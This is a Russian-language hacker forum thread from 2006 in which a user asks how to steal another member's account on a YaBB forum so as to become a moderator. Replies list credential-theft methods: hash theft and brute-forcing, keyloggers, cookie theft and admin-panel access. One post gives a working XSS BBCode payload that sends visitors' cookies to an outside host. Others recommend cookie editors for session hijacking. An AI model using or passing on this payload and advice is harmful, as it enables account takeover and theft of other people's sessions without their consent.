Как угнать ник в YaBB форуме??

Discussion in 'Песочница' started by ViK_WS, 21 Mar 2006.

  1. ViK_WS

    ViK_WS New Member

    Joined:
    29 Jan 2006
    Messages:
    43
    Likes Received:
    0
    Reputations:
    -5
    Как и мона угнать ник из форуме мож есть какие нит скрипты помогите плиззз
     
  2. donetsk

    donetsk Elder - Старейшина

    Joined:
    30 Jan 2006
    Messages:
    158
    Likes Received:
    14
    Reputations:
    2
    хешь есть?
    Для начала угони хешь, потом его перебери, потом получишь пас(может быть, если повезет)
    Можно брутом попробовать
    Можно пас кейлогером угнать
    Можно получить Доступ к админке и поглядеть хеш, потом его перебрать
    Можно через кукисы его угнать
    Можно поставить Open Pas , если пас сохранен и у тебя есть физ доступ к машине
    Кароче способов куча, скажи что хочешь конкретно , какой доступ есть и к чему и вообще по подробнее!
     
  3. ViK_WS

    ViK_WS New Member

    Joined:
    29 Jan 2006
    Messages:
    43
    Likes Received:
    0
    Reputations:
    -5
    есть вообщем форум и хотелось бы подняться по выше и стать модером!!!Меня инетересует вариант с кукисами,доступ к админке!
     
  4. cyber

    cyber Banned

    Joined:
    20 Nov 2005
    Messages:
    31
    Likes Received:
    14
    Reputations:
    5
    ну тогда читай про xss :)
     
  5. roman_gt

    roman_gt New Member

    Joined:
    4 Apr 2006
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    типы а есть чо нибудь на YaBB 2!!!?????????
     
  6. offline

    offline New Member

    Joined:
    16 May 2005
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Code:
    [U*L]http://www.[U*L=http://wj.com/style=display:none;background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;) ]wj[/U*L][/U*L]
    вот эта штука от ипб помоему но в ябб первой версии работала точно даж без изменений хотя кусок кода торчал...
     
  7. Lord Nikon

    Lord Nikon Banned

    Joined:
    12 Sep 2005
    Messages:
    224
    Likes Received:
    15
    Reputations:
    -3
    Слушай я когда тут первый раз побывал,сразу начал спрашивать типо угоните аську,взломайте сайт и т.д.Мне начали твердить гугл те в помощь,типа пользуйся поиском форума и т.д.Я сначало забил на это,но потом решли попробовать( подумал а вдруг поможет),и правда помогло,пять минут и я уже имею нормальное представление о какой нить уязвимости,а дальше можешь задать вопрос,и он я думаю будет выглядеть намного профессиональней,чем "Взломайте пожалуйста сайт".
    Yandex.ru
    Google.ru
    Ну и поиском форума.
    Тока ты не обижайся. =) Я те дружеский совет даю.
    Кстати тут еще раздел видео,там тож есть много интересного и кстати насчет YaBB есть видео кажись.
     
  8. member_ru

    member_ru Elder - Старейшина

    Joined:
    8 Dec 2005
    Messages:
    46
    Likes Received:
    3
    Reputations:
    0
    donetsk, можно не брутить, а просто заменить свои на украденные. Что намного проще сделать, чем брутить его.
     
  9. Katafalk

    Katafalk New Member

    Joined:
    15 Sep 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Какую прогу посоветуете для подмены кукисов?
     
  10. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    AnEC Cookie editor
     
  11. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    Качай
     
  12. Wildcats

    Wildcats Elder - Старейшина

    Joined:
    21 May 2005
    Messages:
    68
    Likes Received:
    7
    Reputations:
    0
    пользуйся оперой...инструменты=>дополнительно=>Cookies=>изменить и редактируй на здоровье)
     
  13. Sulf aka Joker

    Sulf aka Joker Elder - Старейшина

    Joined:
    3 Jul 2006
    Messages:
    88
    Likes Received:
    23
    Reputations:
    3
    А хсс уязвимость через что на ЯББ сработает?
     
  14. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    ребят а пассивные Xss на Яббе ест?